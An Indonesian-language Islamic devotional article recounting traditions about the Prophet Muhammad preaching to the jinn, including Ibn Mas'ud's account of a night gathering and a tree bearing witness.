Menurut Al-Tsauri, yang diberitakan oleh Ashim dan bersumber dari Zurr bahwa jin yang hadir itu berjumlah sembilan jin. Sedangkan pendapat Al-Tsauri yang diriwayatkan Ikrimah, jumlahnya melonjak secara fantastis, yaitu dua belas ribu jin.
Terlepas mana yang benar dari jumlah-jumlah tersebut; yang jelas, pertemuan Rasulullah saw dengan bangsa jin tiada lain adalah untuk mendakwahkan agama tauhid kepada mereka. Di antara para jin yang pernah ikut mendengarkan dakwah Rasulullah saw tersebut, menurut Ibnu Durair, adalah Syashir, Mashir, Munsyini, Masyie dan Al-Ahqag.
Dalam buku Laskar Api: Buku Paling Pintar tentang Jin karya Ruqayyah Yaqubi disebutkan bahwa ada suatu malam yang disebut dengan istilah lailatul jin (malam jin). Artinya, suatu malam di mana Rasulullah mendatangi para jin untuk berdakwah: mengajarkan agama dan memperdengarkan ayat-ayat al-Qur’an. Istilah ini semakin menegaskan bahwa ada hari-hari tertentu di mana Nabi akan mendatangi bangsa jin untuk berdakwah.
Tempat jin yang didatangi Rasul untuk berdakwah berbeda-beda: kadang gua, kadang pula pohon besar dan sebagainya. Misalnya, seperti disebutkan Mazayasyah dan Ummi Alhan Ramadhan M,bahwa suatu ketika Allah pernah mendatangkan kepada Nabi sekelompok jin untuk belajar agama kepadanya. Konon, sebuah pohon besar kemudian menawarkan dirinya kepada Nabi sebagai tempat berkumpulnya para jin yang hadir tersebut. Para jin itu pun datang dan lalu belajar agama kepada Nabi. Setelah itu, mereka segera kembali kepada kaumnya untuk menyampaikan apa yang telah dipelajarinya dari Rasul.

Mengajak Sahabat

Dalam dakwahnya kepada bangsa jin, Nabi kerapkali mengajak sahabatnya untuk melihat apa yang dilakukannya tersebut. Menurut Ibnu Mas’ud, suatu malam, Rasulullah saw pernah bersabda kepada para sahabat, “Barangsiapa pada malam ini ingin mengetahui masalah yang berkaitan dengan jin, maka ayo, ikutilah saya.”
            Ternyata, tak ada seorang pun yang berani menyatakan kesediaannya untuk ikut bersamanya. Biasanya, diamnya para sahabat itu bukan karena mereka takut atau tidak mau mengikuti Nabi saw. Akan tetapi, mereka merasa segan kepadanya. Rasa hormat dan sifat ingin memuliakan Nabi saw yang begitu besar menyebabkan mereka tidak banyak bicara di hadapannya.   Pada kesempatan itu, Ibnu Mas’ud memberanikan diri untuk usul kepada Rasulullah. Ia menawarkan diri agar dapat menyertainya. Akhirnya, Rasulullah saw mengajak Ibnu Mas’ud pergi menuju dataran tinggi di kota Mekkah. Setelah sampai, ia membuat garis di tanah dengan menggunakan jari kaki. Ibnu Mas’ud diperintahkan untuk duduk di garis itu. Setelah ia duduk, kemudian Rasulullah saw berjalan menjauh dari tempat Ibnu Mas’ud duduk.
            Dari kejauhan, Ibnu Mas’ud masih dapat melihat Rasulullah dengan jelas. Ia berhenti di suatu tempat dan kemudian membaca ayat-ayat al-Qur’an. Tak lama kemudian, Ibnu Mas’ud melihat banyak orang mengerumuni Rasulullah saw. Ia tak tahu dari mana arah datangnya mereka itu. Tiba-tiba saja mereka muncul dan mengelilingi Rasulullah saw. Bersamaan dengan itu, Ibnu Mas’ud tidak bisa lagi melihat tubuh Rasulullah dan bacaan al-Qur’an beliau sudah tak dapat didengar olehnya.
            Ketika penyampaian ayat-ayat al-Qur’an itu telah selesai dibaca Rasulullah, Ibnu Mas’ud melihat orang-orang itu mulai pergi meninggalkan Rasulullah secara bergerombol. Mereka tampak seperti mega yang berarak-arakan di atas langit. Namun, ada satu kelompok lagi yang masih tetap tinggal bersamanya. Rasulullah terlihat masih menyampaikan dakwah kepada sekelompok jin tersebut sampai fajar tiba.
            Setelah itu, ia menyudahi pertemuan dan kembali mendekat ke arah Ibnu Mas’ud yang masih setia duduk menunggu. Kepada Ibnu Mas’ud, Rasulullah bertanya, “Lihatlah, apakah yang mereka kerjakan?” Ibnu Mas’ud menjawab, “Ya Rasulullah, begitulah mereka.”
            Mendengar jawaban Ibnu Mas’ud demikian, Rasulullah kemudian mengambil sebatang tulang dan kotoran. Ia memberikannya kepada para jin yang masih menunggu di situ sebagai bekal mereka. Setelah itu, ia bersabda, yang isinya melarang siapa pun beristinja atau bersuci dengan menggunakan tulang dan kotoran.
            Pada masa itu, di negeri gurun pasir, tulang hewan dan kotoran acap kali menjadi kering-kerontang. Orang yang kurang hati-hati, bisa jadi akan mengambil salah satunya sebagai alat untuk beristinja setelah membuang hadats besar atau hadats kecil. Padahal, jika air tidak ditemukan, alat yang dibolehkan untuk beristinja adalah batu.
            Dalam riwayat lainnya dengan sumber yang sama, yaitu dari Ibnu Mas’ud, dikatakan bahwa pada saat itu Ibnu Mas’ud sempat melihat dan mendengar ada jin yang bertanya pada Rasulullah saw, “Siapa yang telah bersaksi bahwa engkau adalah utusan Allah?”
Rasul kemudian menunjuk ke arah sebuah pohon yang tumbuh di dekat situ, seraya balik bertanya, “Apakah jika pohon yang berada di dekat kalian itu mau bersaksi bahwa aku adalah utusan Allah, maka kalian akan ikut beriman?”
Bersamaan dengan itu, Ibnu Mas’ud melihat tiba-tiba saja pohon itu menggerakkan cabang-cabangnya. Kemudian Rasulullah bersabda kepada pohon itu, “Apakah kamu bersaksi bahwa aku Rasulullah?” Pohon itu lalu mengeluarkan suara sebagai jawaban, “Ya. Aku bersaksi bahwa engkau adalah Rasulullah saw.”
            Demikian salah satu model dakwah Nabi kepada bangsa jin. Jadi, kadang Nabi mendatangi para jin tersebut di sebuah tempat tertentu, seperti pohon besar, gua, dan sebagainya; dan kadang pula mereka sendiri yang mendatangi Rasul untuk belajar agama. Dalam dakwahnya itu, Nabi juga kadang mengajak sahabatnya dan kadang pula sendirian. Yang jelas, apa yang dilakukan Rasul benar-benar sebuah perjuangan yang sangat berat. Sebab, ia tidak saja berdakwah kepada manusia, tapi juga kepada bangsa jin. Semoga kita termasuk hamba-hamba Allah yang mendapatkan syafaatnya di akhirat nanti! Amin. [pelbagai sumber]